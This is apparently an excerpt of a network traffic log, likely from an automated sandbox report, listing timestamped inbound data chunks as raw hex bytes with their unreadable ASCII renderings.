2023-08-10 17:13:01 UTC	33	IN	Data Raw: 10 86 45 29 99 8a e5 f0 16 54 ac b9 b1 22 1f 8e 5c 3d 5c 7f 96 82 04 17 32 c5 e9 9a 7d da aa f2 11 1a 34 4b c9 3d 79 3f 54 20 1c 6d 66 09 d2 11 f3 5d 6b 4c b0 d0 62 7b c8 17 a1 5b 57 91 77 5b ab b6 a2 e1 34 2d e1 27 30 b0 3e 77 75 c6 b6 1d cd 7d 37 b2 fb 47 7f 52 a7 8d 5e 5d de 8f 12 92 e7 fe 54 da 94 b3 10 08 9a cf 25 c9 Data Ascii: E)T"\=\2}4K=y?T mf]kLb{[Ww[4-'0>wu}7GR^]T%
2023-08-10 17:13:01 UTC	34	IN	Data Raw: a7 32 61 7f 99 72 2d 3c 68 03 b2 53 32 d0 a4 86 de b8 e8 fa d5 a6 fd b5 fa c3 b5 14 f3 2d 7e 80 b2 2d c9 dc 76 97 fc 9e b4 e7 c4 4c 9c cf cb 90 c8 b3 72 1c d4 5d 97 35 ec 50 dd 99 a7 03 1f c1 4f a4 00 a8 6f e9 9e 06 7a 6f fd f3 50 b4 ec bb 11 14 ed 13 07 6f d0 3c c3 d2 82 f7 b4 71 f4 5e 4e 21 2f 93 f8 03 0a b7 ae b9 6a f3 30 ca 25 85 9f 2b 32 cf 3e 29 f6 a1 64 87 c2 a7 4c c1 b4 fa 26 d9 c7 27 80 30 b5 06 e5 0a 9b 5b 49 10 f5 9b e9 8f 0a 93 eb e4 90 bd 35 ee 8e fe 89 1c ac 8b 0f 4d ac bc 72 07 81 cc 7a 73 30 c5 e8 82 34 3c 62 de 6c 4b 42 5e f6 5a cb 41 e3 a2 bf a4 a0 f3 e6 5e ff a0 39 94 2d 00 dd ac b8 b9 b7 b4 74 0d 5a 95 7a cb ba 5b 54 fa 46 86 e6 99 ac 2f be 4a 8a 0c c6 5e c6 3c d6 fe a1 07 a5 5a bd 0a 79 0c f6 9f 7f dd 91 93 3f c8 36 e6 46 cc 21 96 e8 Data Ascii: 2ar-<hS2-~-vLr]5POozoPo<q^N!/j0%+2>)dL&'0[I5Mrzs04<blKB^ZA^9-tZz[TF/J^<Zy?6F!
2023-08-10 17:13:01 UTC	35	IN	Data Raw: 65 72 55 ae 61 47 04 39 12 d0 39 cc 2c 88 fe 81 ba 57 fa 01 d0 c1 65 b4 bb 90 b6 d2 b0 e8 b0 7f ae fc 8f 26 25 55 0c 9e 80 98 21 f1 1c 07 ca 56 6d 62 d5 a9 01 12 e8 4c cf cb c7 99 b6 3f 79 ec bf 12 9f cd cb 87 b0 61 80 29 1d fa e3 40 34 44 45 ca 57 dd 9b e7 62 55 b0 1b 4c d2 a8 51 e0 d3 a7 e9 0d 78 05 b9 9b 90 9c 4f 44 a5 52 43 0b a8 12 de ea cd 4d 76 5b f7 8f 48 7f df b9 ea 19 03 cf 6f 81 67 46 4b e8 ad 53 76 fe 1f 2e 1c 52 95 86 d3 db 58 fc 5c bd d8 1c 6e c4 21 a2 bc 13 54 5e 6a 75 9d 27 0a d5 88 fe cf a9 31 21 34 df b9 b4 5a bb e7 92 91 26 c6 19 e4 83 83 4c 0f af ad 87 b7 66 0e 07 b7 4f da 6a 7d 11 d1 38 a3 1a 67 93 02 34 63 da 23 46 20 d3 f7 46 54 bc 9c 11 ea 71 1d ec 4d 40 77 d8 db 03 2e c6 d9 c6 31 c9 64 fc d8 2f 6a b4 87 67 88 e0 c9 df 50 72 6c 92 Data Ascii: erUaG99,We&%U!VmbL?ya)@4DEWbULQxODRCMv[HogFKSv.RX\n!T^ju'1!4Z&LfOj}8g4c#F FTqM@w.1d/jgPrl
2023-08-10 17:13:01 UTC	36	IN	Data Raw: 23 ed d1 03 3d bf 85 1c 8d 26 4a 2e 85 20 64 1b 4e d8 cf a1 9c 68 5c c0 54 3c 9b 57 6b df 69 0f 79 3c 62 48 c0 37 b2 ad 19 1d 9f 3f 81 35 b9 a9 79 ff 52 e4 ca d1 20 9c 28 1a e6 33 64 90 5f ba 00 f4 43 fc b5 db 27 9e f1 ee cb 99 f1 f2 5f 4f 0f b9 eb 68 4d eb 76 ca f1 82 a9 5f 76 08 67 0e 5d d6 b5 ef 59 fc 7a cf 8c b6 4a b4 1b 57 52 27 85 bc cc 9e 95 53 f6 82 66 87 93 3d 64 65 cf 70 18 63 53 24 f8 5e 5d 63 47 42 e9 5c 74 ce 3a 60 fa 84 64 38 8e f3 02 07 63 70 48 6b b4 7d b2 ad 44 ab 4a 9d 74 a7 15 8a ad 91 5d 42 0f 66 29 ca 3e 07 f7 85 ea b7 df 15 ad e2 fc 1f ae 7b e8 18 bd 90 39 69 d8 18 b9 0e 9b 4e 86 41 37 ac d3 e8 39 76 41 d2 6c 54 98 df e9 cc 4f c0 da 9e e3 57 d8 af 9d 06 cd 89 fd 86 46 d3 6f ed ff ca 63 54 9f ef 51 ce da 28 04 3b 32 33 31 f5 30 ab 3e Data Ascii: #=&J. dNh\T<Wkiy<bH7?5yR (3d_C'_OhMv_vg]YzJWR'Sf=depcS$^]cGB\t:`d8cpHk}DJt]Bf)>{9iNA79vAlTOWFocTQ(;2310>
2023-08-10 17:13:01 UTC	37	IN	Data Raw: 7b 6c f2 53 4e d7 b6 af df 3c 9b a5 d2 d2 ca dc b5 95 25 15 a8 b9 c3 f0 4f 9a 0c 60 f3 68 97 14 07 6b 7d 31 a3 80 83 76 42 02 a0 22 4e 30 c4 41 42 1f d3 d6 68 26 62 0b b8 84 98 2f b0 ba a7 a6 46 01 37 66 d3 54 fa 38 60 75 97 c4 a9 9f 0f ca 3b b6 3c 62 2d 08 c1 16 f8 b8 bf 6e 9e 1c dd 1d 7f f7 26 a0 ee 8c 5f fa b2 bc 83 f1 52 ae 9b 60 59 81 ef c2 d5 b2 7e da 91 aa 30 65 c9 ef b7 ec eb 3e 87 07 25 2f bd 81 d4 b0 da a2 77 46 bc b7 bc 7c 63 fa fb 8c a9 fd a3 2e 9d bd 4d 1d f9 f3 cc a2 49 d1 9d 39 21 35 75 d0 72 51 5a 54 19 47 35 4d 2b ff e1 3e 3a a7 7a 92 98 7e b5 ad 4e 93 fd 4b 71 b4 ec 6f bf cc 88 17 23 d8 a4 82 70 67 79 dc a3 76 52 24 0b 94 71 c0 f8 35 41 b7 ae 2e f7 fc cf bf c5 b8 a6 80 8c 96 75 18 b6 1f 9b e4 df da 77 2e b4 cc 26 9e c7 a7 8e fb 42 f9 d6 Data Ascii: {lSN<%O`hk}1vB"N0ABh&b/F7fT8`u;<b-n&_R`Y~0e>%/wF\|c.MI9!5urQZTG5M+>:z~NKqo#pgyvR$q5A.uw.&B
2023-08-10 17:13:01 UTC	38	IN	Data Raw: ed f5 94 f3 bb e4 64 17 9e 26 47 27 7f 63 9c ad c1 af 17 a5 9f 67 47 5b ee 90 29 8f d6 ee ef f0 d6 28 29 a1 73 d2 7c 1f c9 2d 86 58 bf a1 6e 3b 91 a1 1d a6 2b d5 73 44 b9 61 f4 b8 44 c0 01 1f a4 e8 a3 88 88 1c 10 75 f4 34 59 9b cd 53 6d 39 0e f3 fb d3 5e 91 85 da ed 92 89 45 8a 6f 02 e0 82 38 09 0a 8c 90 a5 ba 9b f0 09 d7 f7 fd ba ef 44 68 7e 1d 15 73 71 8e de 58 20 41 5e 90 f4 8f 6d 6a f8 b6 b0 75 45 dc 00 5b cc de d4 09 1b 09 ec ed 67 30 fd d6 da ef 81 77 ad fa a5 0b 3f c5 3a 4c 2f 2f 3f 88 9d 86 a0 0b 02 77 9d 7d cc cb b3 30 5f cb 25 e4 cc 3d e6 ac 34 39 9c 07 9c d5 e1 db 26 a8 15 d9 37 70 c9 5f 9f a1 6e 87 b4 e3 48 32 0c fc 49 c4 96 9c 98 b5 ec 7d 1a 90 22 c6 c8 0d 5c f2 0f 01 ed 2a 31 66 66 65 6a f0 1b 84 c2 05 47 4e b5 d5 1f 64 81 67 e3 06 5b c4 50 Data Ascii: d&G'cgG[)()s\|-Xn;+sDaDu4YSm9^Eo8Dh~sqX A^mjuE[g0w?:L//?w}0_%=49&7p_nH2I}"\*1ffejGNdg[P
2023-08-10 17:13:01 UTC	40	IN	Data Raw: 42 cb cb 1e b8 63 93 88 e2 db 17 4f 85 c0 20 4b 67 8e 43 74 ab ef 04 18 df 06 1a cd 0b a5 d2 d5 f3 91 ac c6 0b cb 6c a9 f4 f5 69 6b cd 51 e7 28 7b 31 f7 e3 e3 2f 09 25 c9 31 84 f4 da 08 62 32 a1 72 02 83 84 f3 d9 0c 60 0f 0f 29 cd 52 87 42 a5 e1 6c ef bc 2c 2e ed df b5 c3 c4 fa 89 67 a8 30 6e ca 1f a7 4d 51 87 e7 ff 25 c0 f2 5c 95 3e 95 01 54 d2 b5 29 85 fb c8 64 c4 37 15 e1 04 e1 74 8f b9 03 e6 74 a2 79 67 09 0b 6c 28 c2 e7 94 b8 d1 77 1c 83 4c f6 fe 8e 03 7e 3e fc db 93 62 e6 c9 b9 d1 a8 a0 89 84 d1 a0 2e 5c 36 1c 74 f3 e2 c7 62 2e 5e 64 03 ab 5b a5 66 4c 40 0f 53 af cb 1c 66 95 32 e8 0f b9 03 4b c7 dc 76 be 84 f9 f6 3b 3b 8d e5 88 a4 e9 8c 9a ad a5 14 1d 8d b6 4a 20 94 ad f3 06 38 ec 14 b3 7f 05 f5 c1 eb 25 7e 21 fe 9c 30 0a 53 ee b2 63 89 27 5d 18 9f Data Ascii: BcO KgCtlikQ({1/%1b2r`)RBl,.g0nMQ%\>T)d7ttygl(wL~>b.\6tb.^d[fL@Sf2Kv;;J 8%~!0Sc']
2023-08-10 17:13:01 UTC	41	IN	Data Raw: bf 10 70 6e 3e cd 7f da 0c d2 c1 d9 25 a7 f4 fb 98 5d 19 d7 57 02 e9 74 48 ee d0 44 41 ae 8d b6 c1 d4 19 67 8f ea 96 69 44 cf 15 de 96 ef 05 08 09 e6 e6 0f 61 60 a8 f8 18 1c 38 33 ad 3e 9f b8 75 f2 f8 3a 3c 6d ed f3 86 f4 0d b1 7b 6f f3 b4 0a 42 10 cd a3 e0 6f e6 ca d2 55 62 b1 62 63 3b f7 d7 b5 19 b8 70 b1 f1 fb ca 5f 8a 4b 4d 7f 1f 46 e8 4b 59 3f 12 a8 47 6e a0 b1 7b 6b 20 df 03 50 f9 df 22 ce 85 3c 5d 5c 0e 50 cd 79 5b 9a b2 ac 46 b7 97 1c 61 78 95 55 3d 11 f4 1f 69 18 43 a0 b3 23 e2 fe 41 42 46 88 53 a8 7e b1 c3 d2 47 1b bb 32 94 8a 78 10 a7 4b 13 4f ab 82 57 9f 24 1a 8e 18 8e f1 35 6a e1 82 6b 60 fc 90 1b 4b 72 32 ee 37 a5 88 8e 7f d8 f6 66 ee 08 eb fc ac d9 32 f2 54 ae ef c0 e7 c4 96 7c da c4 6b ce e8 3a 23 c3 24 24 e3 b9 b8 3e 09 61 25 2f 6f fc 99 Data Ascii: pn>%]WtHDAgiDa`83>u:<m{oBoUbbc;p_KMFKY?Gn{k P"<]\Py[FaxU=iC#ABFS~G2xKOW$5jk`Kr27f2T\|k:#$$>a%/o
2023-08-10 17:13:01 UTC	42	IN	Data Raw: e5 e7 6b b1 2c 2b b5 4d cf f1 d3 45 34 c6 20 b8 ff 25 64 da 50 79 ac 66 14 22 76 2c 3f 90 2b 3a 29 cf 39 2e c7 27 01 7a 5d b2 2a ba 6a c5 ea 99 c3 91 00 21 14 84 ed bd b5 64 57 7d 96 4c ff 52 0f c0 f7 6e 20 28 6b 79 99 a1 0f fb 79 c3 df 1a 52 27 37 20 56 5d 0b b0 7b f4 54 ef b8 4a b7 75 63 f0 eb 9c 00 45 f7 08 44 72 c1 66 bc 08 88 d2 1f 02 27 fc 82 bd 14 59 4e 0a 13 f3 e0 45 0b f7 9d 4a 89 16 9c ad 28 6b 4b 90 d2 84 07 39 ee 36 15 60 8b df d8 52 ce 73 fb 2f a3 77 40 b6 6d e0 44 79 73 24 ff a4 06 1f 77 f1 13 b1 d6 ac 94 14 bf e9 d1 2f d3 51 cf 71 ee 0d f3 d5 02 e6 07 af eb 3e f1 bc 12 c8 31 6a 07 07 66 e3 0a 6f 41 7a ee 73 df 0b b0 4b 00 ab ee 9f 7b 7d d6 0a 9f 71 31 dc 78 31 2d 4c 85 70 14 59 f0 cc 61 72 a1 4f ea 9f ff 2e 7f 84 45 f7 79 8e 7f fd a9 49 f2 Data Ascii: k,+ME4 %dPyf"v,?+:)9.'z]*j!dW}LRn (kyyR'7 V]{TJucEDrf'YNEJ(kK96`Rs/w@mDys$w/Qq>1jfoAzsK{}q1x1-LpYarO.EyI
2023-08-10 17:13:01 UTC	43	IN	Data Raw: 7c 0c c7 27 04 73 0e ef 27 5b cd 41 55 c7 f4 04 4f 47 25 5d 18 04 f0 54 3d 6c f3 90 ba 37 a2 65 23 bd 94 27 bc a8 ad 42 07 dd 07 4d a2 c5 80 b8 26 73 18 27 5e 26 c3 30 83 3f f2 3a fd f2 29 25 a8 44 22 fd a1 b3 19 79 73 38 b4 30 df dc b4 4f e9 7c 61 73 3f 13 9f 6e 5c ef f0 de 77 bb e3 d5 6b dd 61 04 ff 13 5b 46 64 f2 e3 0d d3 ad 9e c9 0a 02 44 d4 5b 2c 79 94 5a 4c a0 ce be c9 e3 33 0f 86 91 2d 54 a6 9c f3 06 f1 98 33 dc 8f 22 5f 93 50 1b 30 ff 94 76 3d 30 73 e4 dc 85 a8 f3 89 f4 54 88 ee 78 2d ee 00 d4 b2 2d 2e e1 a3 77 26 5f e4 18 83 58 bf ad 78 d9 58 42 52 7d de d3 ba d8 e5 b9 41 5d f5 ae 51 d1 bd 7f 2c b2 56 88 c0 cb fc 66 c3 40 e9 d8 19 b3 28 a7 39 2a 2e e7 23 56 39 02 25 fe 33 c3 bf f5 5a 2e d6 2c 4a ab 3c 4f c7 c0 da 7d c2 4b a4 72 be 05 9a f3 28 b2 Data Ascii: \|'s'[AUOG%]T=l7e#'BM&s'^&0?:)%D"ys80O\|as?n\wka[FdD[,yZL3-T3"_P0v=0sTx--.w&_XxXBR}A]Q,Vf@(9*.#V9%3Z.,J<O}Kr(
2023-08-10 17:13:01 UTC	45	IN	Data Raw: 5f a8 4c 7c 4f 40 1b 7f d2 13 33 f2 ad db e8 6e 05 23 1d cf 5b ec 4e e4 50 09 74 e0 eb 00 3d b1 2a 7d 12 8a 15 fe ed 56 1e 2e d2 d8 9b 3f 77 57 94 85 6e eb 8a 9f 72 b4 9e 24 4c 80 13 1f 23 9b 3b 43 d7 b5 83 95 d3 ba 79 75 0b 56 51 66 51 3c 14 ba d8 9c c1 30 73 b6 20 f9 0a 7d 8c 21 9f 4e 89 58 54 2b f6 8b 6d d2 14 fd b6 45 b2 ec a2 c0 d4 fc 0d 46 8b 27 16 7d 68 a4 45 f5 a3 e1 01 2c 4a 80 79 4f 6d fe e2 1e 6f 4d 50 4b ef 19 b1 ee 10 74 b5 51 72 b7 4a 91 ad 25 ca 5b 0c af fe b0 a8 a3 77 e4 da 81 fc 4f f1 39 82 97 56 66 c4 55 0d c3 d6 2e 9e f4 fc 63 95 7d 0c 6d ed 16 21 f4 1c 79 7b bb 07 4b f5 85 55 c6 75 27 ea 3e d6 d9 aa 2b 3c 77 8f c6 7d 8f ab e6 47 71 e7 19 c1 c8 25 95 e7 31 78 95 82 20 1b 9e ba f6 0b 50 0d ab b1 53 a9 3f 69 2b e5 85 45 5b 5b d8 b7 df 25 Data Ascii: _L\|O@3n#[NPt=*}V.?wWnr$L#;CyuVQfQ<0s }!NXT+mEF'}hE,JyOmoMPKtQrJ%[wO9VfU.c}m!y{KUu'>+<w}Gq%1x PS?i+E[[%
2023-08-10 17:13:01 UTC	46	IN	Data Raw: f2 a3 37 f1 29 ca 50 87 db de b1 63 94 84 12 a6 96 ab ed aa 1d 26 99 5e b9 c6 10 81 c6 84 54 6c 5d 4e 64 88 e3 40 fe 30 06 4c e2 26 40 d3 6d d9 ac b0 3e 1c 63 14 64 9d 36 8a ab 30 f3 71 a8 0d 4c 28 37 bc 46 08 ec df e1 da 90 a0 9e d9 14 19 5c db f8 b9 aa 02 e3 cd f2 37 be 0e 9b ac f5 c8 79 49 ea 39 9d 54 c7 bc 9a 75 54 88 70 da 31 84 3c aa 0f 32 11 f7 58 1d 74 0b d4 ec 30 76 7d f6 75 5c d3 f1 bb 80 85 c8 c0 cd 2d d2 12 21 4c b2 1b ef 47 90 2b 63 76 91 81 29 19 10 13 d8 61 2e 35 59 aa 02 6f d9 5c c6 9c e3 f5 3c cd 1e 71 a0 f7 6a b8 23 f8 ae c5 f7 f1 62 db 52 62 de 36 fd ef 6b 94 1b 4c a4 ad 83 3a 0f ed 65 05 b8 0f cf a7 ee a2 4b 8d da e4 24 1c e3 97 20 6c 8d 05 e6 ac 1c e5 08 88 61 fb a5 96 37 82 9e 97 b7 db da af 1c d6 75 71 e8 3d 5d 62 11 7f 76 e2 68 c2 Data Ascii: 7)Pc&^Tl]Nd@0L&@m>cd60qL(7F\7yI9TuTp1<2Xt0v}u\-!LG+cv)a.5Yo\<qj#bRb6kL:eK$ la7uq=]bvh
2023-08-10 17:13:01 UTC	47	IN	Data Raw: a2 f8 53 29 b5 53 ec d6 4a 3d 4c 8a 99 89 2f 8a be af 5f 88 bf 5a 56 9b 7f c5 ff ca e5 00 9a 2e 39 fa 8c 98 8c 8a 10 cf 66 bc f2 c9 f4 b0 73 13 34 5f 17 db 0d 72 fb a4 b3 f7 48 c0 85 2c e3 d8 48 8a 42 f2 32 3c f5 cf c4 37 ab c2 8c bd 6b 4d b5 2c 43 86 07 28 41 ba 5d 01 11 3c 03 70 94 89 c8 b8 dc af 0d 0c 91 96 b5 2b bf 07 82 04 08 be 87 5e 0a b6 df c4 d5 7a 67 a4 7d cc 32 0e de f7 61 a0 99 5d 0d 0d 99 48 b8 1b ae 89 58 c1 e1 54 89 48 c7 ab 1c ec 05 9a 08 43 59 a5 1d bd 7d 94 02 8d 65 37 7d b9 96 8c b4 fd 46 72 05 46 c8 d0 e3 74 92 84 a6 bd 7c e0 e6 3d 0e b3 36 53 63 79 b5 f7 63 05 15 09 5f 83 dc 36 de c9 46 1f ec 10 7b ba c7 96 ff ab a7 11 ec db 39 85 f4 bb 15 35 12 c5 13 4f 05 47 37 0a 78 03 5b 38 f4 67 62 b6 10 33 cf 0e 67 eb f6 79 85 0f de 6b cf 8d ca Data Ascii: S)SJ=L/_ZV.9fs4_rH,HB2<7kM,C(A]<p+^zg}2a]HXTHCY}e7}FrFt\|=6Scyc_6F{95OG7x[8gb3gyk
2023-08-10 17:13:01 UTC	48	IN	Data Raw: 30 74 0d a7 c7 3a c4 5b 46 37 f9 8f 22 37 d2 51 ac 44 d5 92 88 fa 73 8d d2 c6 6b 2b 0e dc cc 5f 2e 33 03 9d 8d 23 ed 7b d4 e6 3e c7 fd 97 7f 53 be fb 13 d8 4c 80 c3 f4 fa 7d f5 92 6f f7 4f 0d 60 1c 49 5a 99 15 df e8 18 0f a4 84 72 49 90 30 10 83 2b 4f 1c 99 85 4c 4f 21 14 da 1e 90 95 98 2f 34 9d 17 48 4b 7e 84 aa b4 16 81 64 dd 0f 19 0b f1 a8 e7 3e 82 02 34 b7 44 35 76 ef 80 2d d4 fe d9 9d e3 92 e2 79 a9 aa 40 57 0d 75 dc 2a 70 a1 1c 14 38 6f 50 5c 45 68 1e ef b7 1d 04 91 83 29 e0 e1 27 7b 92 64 42 a3 d0 ba a7 08 ac 7f d8 b3 0f 1f ef fc a3 41 e3 6a c1 bb 12 a9 d5 cb 4d 71 76 6d ed a2 76 1c 3a 22 a4 bb 97 99 09 df 3e 8f f5 fe 19 e5 aa 83 67 2b a9 bb b0 40 ea 6e 75 43 cf b5 63 ac d0 67 c4 77 ba 55 1f a1 3f 2d 67 3a cd d9 da 0c d2 ba 61 f6 9f 96 c6 98 26 6e Data Ascii: 0t:[F7"7QDsk+_.3#{>SL}oO`IZrI0+OLO!/4HK~d>4D5v-y@Wu*p8oP\Eh)'{dBAjMqvmv:">g+@nuCcgwU?-g:a&n
2023-08-10 17:13:01 UTC	49	IN	Data Raw: 65 78 a0 d8 b6 52 c1 da 74 92 87 71 e3 d3 f6 5d 33 81 ba df 2a e2 4d 03 32 e7 a6 e2 69 27 41 dd c1 1f 1e 07 ce 95 5c 99 32 a3 b5 83 9b 03 d6 12 e3 a6 10 6b 9a f4 79 6d 53 3c dc 23 b6 0d a9 74 36 3a 71 1e c7 0a 8c 8e 11 62 e9 e8 d5 a3 f7 98 3c 22 16 1f 4f 5b 31 26 b6 97 4a 3b 2f 84 ef 7d 64 8c fb b4 6e 91 08 e7 75 9a ff 38 Data Ascii: exRtq]3*M2i'A\2kymS<#t6:qb<"O[1&J;/}dnu8
2023-08-10 17:13:01 UTC	50	IN	Data Raw: 4c 0b e4 bf b6 80 5c 47 bb e2 fa 15 43 db a5 b7 d4 d8 a3 a1 b9 b7 b8 e2 1d 61 52 f0 95 d1 15 c6 22 d5 71 48 1e e6 be f3 5c 9c 14 8d af ae 61 23 86 43 0e 3e 46 6f 09 ec eb b6 d4 df 36 67 86 b8 8b 55 05 e1 d3 5b fb 8e 57 09 b6 7f 36 cb 3e 6f e4 e9 6b e6 ac b2 52 aa 6c 7a 54 a9 9a a2 47 84 5e b2 8a 68 b6 f1 64 83 18 7b be 32 92 62 95 ee b3 4d 0c f2 d1 8f 08 8d 39 36 8b ed 9b 71 94 ba 38 4e 7c 37 13 20 c1 01 0f c1 77 ea 23 41 a0 58 80 f5 aa fe 2f 09 ac 5e c8 a5 63 a8 4f 27 2b a3 4e 56 8f 3a 61 53 1b 2f eb 1d 35 15 ed 1d 17 e6 54 02 a0 6f 90 fc 00 05 09 9b ff 76 47 e2 00 6a 01 d0 89 55 d3 e4 10 98 a6 35 dc 48 ec 28 44 52 52 cf 77 58 2c 4a 7d 97 07 bb 9a 52 69 f9 03 f1 9c 0f 14 68 61 0f 03 8e c1 d1 d4 3b ed bf 88 99 df 46 66 04 fa bd 9f 40 51 f0 0c dc 12 4a 09 Data Ascii: L\GCaR"qH\a#C>Fo6gU[W6>okRlzTG^hd{2bM96q8N\|7 w#AX/^cO'+NV:aS/5TovGjU5H(DRRwX,J}Riha;Ff@QJ
2023-08-10 17:13:01 UTC	51	IN	Data Raw: 23 31 6d b7 6a 19 fa 9d 8a 2a ba 00 e4 d0 72 63 80 e9 cc 04 66 b2 23 59 e4 42 40 24 1d b1 da a0 79 5c 03 03 b5 ad a1 f5 68 98 01 3b 6c 62 4d 0c 15 8c da eb 34 c9 c8 e9 29 91 1d 3c e9 65 34 dd b9 14 b2 30 84 b3 bb 96 a8 a0 0d 01 a3 f2 f2 14 45 0b c2 43 29 b4 c6 72 65 84 14 14 f9 0e 65 c0 df 82 1f dc 2c 3c b4 f4 c7 ca 8d f9 65 7b 0b a6 a9 14 fc 4b 75 31 82 8f c4 5e 9e 51 c3 99 e1 7e fe 57 33 a4 30 cc f2 7e 27 08 d2 a2 2e 08 99 76 38 1c 41 23 14 e4 18 81 e1 18 cb bd da e0 c7 65 74 85 01 6c dc 11 d7 82 45 58 9e 25 a8 34 e8 c6 2a 83 4a 74 36 db 8e c4 b9 31 45 d5 36 6b 11 08 c8 7a a0 3b b2 b6 05 53 4e 7d 15 03 67 3e 13 7d 50 ff d1 4f 8f bb 2f 23 ea 10 01 00 41 22 d1 69 22 dd 42 4e dc 5d 60 97 e5 9a d6 15 02 56 86 8f bc 89 7d 38 55 14 8c 59 fd 5e d0 77 7e 74 1a Data Ascii: #1mjrcf#YB@$y\h;lbM4)<e40EC)ree,<e{Ku1^Q~W30~'.v8A#etlEX%4Jt61E6kz;SN}g>}PO/#A"i"BN]`V}8UY^w~t
2023-08-10 17:13:01 UTC	52	IN	Data Raw: 7c 56 de e5 98 ca a4 12 7f 8d a3 74 0d a7 b5 3d 64 63 3c 1e 87 8f d2 97 89 18 29 83 07 0e df 7c 73 b2 84 c7 e1 e3 0f 81 36 a0 d1 58 eb 9e c5 e4 80 ea bd e6 3e c7 ca 8e c2 62 34 ff e1 26 b3 b7 34 59 5a 4e 8f e9 94 85 35 1a 54 63 8e f7 1c cd 73 ff 2f 73 2e 83 bd 56 96 78 e7 f5 49 34 b5 26 32 0e 11 be 6b e8 e1 bb 52 b8 7c 9b 59 83 e0 5c c0 ea 44 44 c3 2e 31 2d b5 e6 a7 55 2e 13 ca ba 78 40 28 2d 35 37 6d 44 39 9a fe 9d 92 e3 92 61 4d 28 16 78 2d a9 81 a5 59 99 81 1f 9f 42 1e 0c 58 45 1c c6 69 9c ee 37 eb d0 ba d3 76 e6 82 fb 83 85 b0 9f be 18 a7 40 a7 b3 f2 c8 c9 b3 2f ca 41 1c a9 92 ff 11 38 e8 eb c6 b8 98 a4 f3 ae e2 cf 6e 26 c8 bb 67 ec 49 b5 f9 87 b6 01 e7 1a e2 2c f1 43 80 ad 8b 44 7f 91 27 43 37 ce ac 2b 18 9c 6b de 1a a3 4b 16 07 fb 43 d1 55 d9 a6 77 Data Ascii: \|Vt=dc<)\|s6X>b4&4YZN5Tcs/s.VxI4&2kR\|Y\DD.1-U.x@(-57mD9aM(x-YBXEi7v@/A8n&gI,CD'C7+kKCUw
2023-08-10 17:13:01 UTC	53	IN	Data Raw: 0a 45 c4 98 9d c1 89 02 6c 45 90 d4 13 e0 cc b7 b9 55 74 e4 08 f1 d4 2b fe d3 a4 7d cc eb 0a ed fe 3b 3e 12 03 e2 69 51 f6 a0 dd 27 64 8c a3 6a a3 66 13 fb 04 bb e1 48 f9 60 91 8e 66 a4 29 62 ae 43 fc 4e ae fe 39 fa 1e e2 e1 37 01 ad c7 7e b8 9b d6 75 e9 ac 5c 00 83 36 20 d5 a1 27 c5 65 cf 50 cc 34 74 80 e8 c8 ef 95 66 8c fb 06 db 95 10 c8 75 68 fd 38 38 d0 76 4e 5f 33 fc 58 cb 79 fa a3 37 8d 2c 8c 00 2a 5e 08 ae a2 09 7b ed 59 62 30 97 d1 15 54 25 d1 21 d9 73 4d 21 f3 5c 10 66 96 18 dc 8c 78 84 43 19 c6 70 91 7e a0 f3 7e d6 df 36 ba cb 2f f6 f0 7f b2 77 f7 ec e7 35 be b6 e1 ec f0 05 ce 40 ab fb 56 26 20 5c f2 c2 d3 fc db 72 3a be f2 48 f5 88 50 4d d5 64 db 90 bc c4 fb 67 10 32 cf d0 3d ef ca ab 1c 7e 8a 2e 73 a1 5a ef 3d e1 fd 01 bd 06 02 5f 6b e6 ac 8a Data Ascii: ElEUt+};>iQ'djfH`f)bCN97~u\6 'eP4tfuh88vN_3Xy7,*^{Yb0T%!sM!\fxCp~~6/w5@V& \r:HPMdg2=~.sZ=_k
2023-08-10 17:13:01 UTC	54	IN	Data Raw: f3 cc 6f 1c 7f 6a 6c 21 ed cb 52 cb 86 5d af 5d 08 32 0d 87 1e 75 9e a9 36 68 37 0d f6 2e 3f b0 81 6a a4 fd 85 67 98 ee 58 44 cc 34 5b dc 0b e8 7a 37 33 da 06 06 e3 1d f1 48 56 8f 06 97 14 51 92 22 33 ce 5c 47 d9 00 b1 11 d7 65 21 a0 35 5d d9 26 9f 2b 96 91 f6 c0 96 a4 6c 04 a8 1c 71 6f 5a 4e e2 42 d8 f8 37 3d 30 50 b6 42 2a f8 75 15 81 c3 a1 79 7e 03 b9 b7 b4 74 0d 8d 86 2f c7 d2 d7 6b ed 11 5d a7 99 ee 30 ce 45 2c 3f 44 f2 39 e5 02 da 9e 47 f3 41 40 eb c4 f0 5b 88 25 3e 2e 39 fd 0c 8d 0f 30 9d 4b eb 08 f2 bc b5 55 26 b8 f0 d7 06 77 7f e5 03 2f 43 69 94 c9 8a a7 2a 37 a8 cb 2d ca 48 f5 89 f0 4f 13 84 f0 10 7a 84 d8 24 8e 72 8e 8c 83 c7 11 99 99 be 2b d3 10 74 f2 4b f5 59 b6 34 87 69 01 d8 d2 1b 07 82 11 d7 66 99 c4 70 ed 7f 65 77 30 42 27 dd 61 b7 cc 26 Data Ascii: ojl!R]]2u6h7.?jgXD4[z73HVQ"3\Ge!5]&+lqoZNB7=0PBuy~t/k]0E,?D9GA@[%>.90KU&w/Ci7-HOz$r+tKY4ifpew0B'a&
2023-08-10 17:13:01 UTC	56	IN	Data Raw: 47 58 9d ac 89 88 e9 d5 44 5a 63 0f 7d 94 0e c3 8d cf 7f 0e 5d be b7 c8 0f 35 a0 74 3f 8b 6d 54 1c 65 a5 52 4c 89 ed d0 c2 2c e2 ca c3 f3 a7 76 2a 93 87 f4 e3 21 bd bf d2 38 9b 10 f8 7f 3e 1d ad 3e fe 95 68 d1 84 bc c8 1c c1 4d f4 03 ad 43 ad ca 08 ce ae 25 05 b8 42 fd bb ec 7f 31 8e 4f 3f 75 4b b4 22 7c 33 26 e3 b1 2f a5 2e 9a b3 10 b2 c9 40 40 eb b8 f2 41 eb f4 01 1a b0 bb ce e6 b1 ed 7b 69 aa 9d fa d1 a5 ce 47 dc 85 75 3b 4c bd e5 d9 93 ef 63 05 10 7d 24 a8 91 2f c2 be ed 77 56 8a e0 6d 82 e1 72 85 7f 48 19 94 b1 ce d1 8b 1d 61 7a 01 dd de a2 d8 d6 2a 7c f3 6e 39 bf 1a c5 1b c1 44 f7 60 48 8d 7b b7 f5 4b 4e 4a d6 8e 1a 5d b9 85 86 a7 e5 ac 38 aa 9b 87 32 17 1a ca 7a 65 45 ec de ec 24 d1 95 f5 cf a4 89 ac 8c 82 ba 22 a2 e4 1d e1 21 09 67 a0 ac b6 e6 a4 Data Ascii: GXDZc}]5t?mTeRL,v!8>>hMC%B1O?uK"\|3&/.@@A{iGu;Lc}$/wVmrHaz\|n9D`H{KNJ]82zeE$"!g
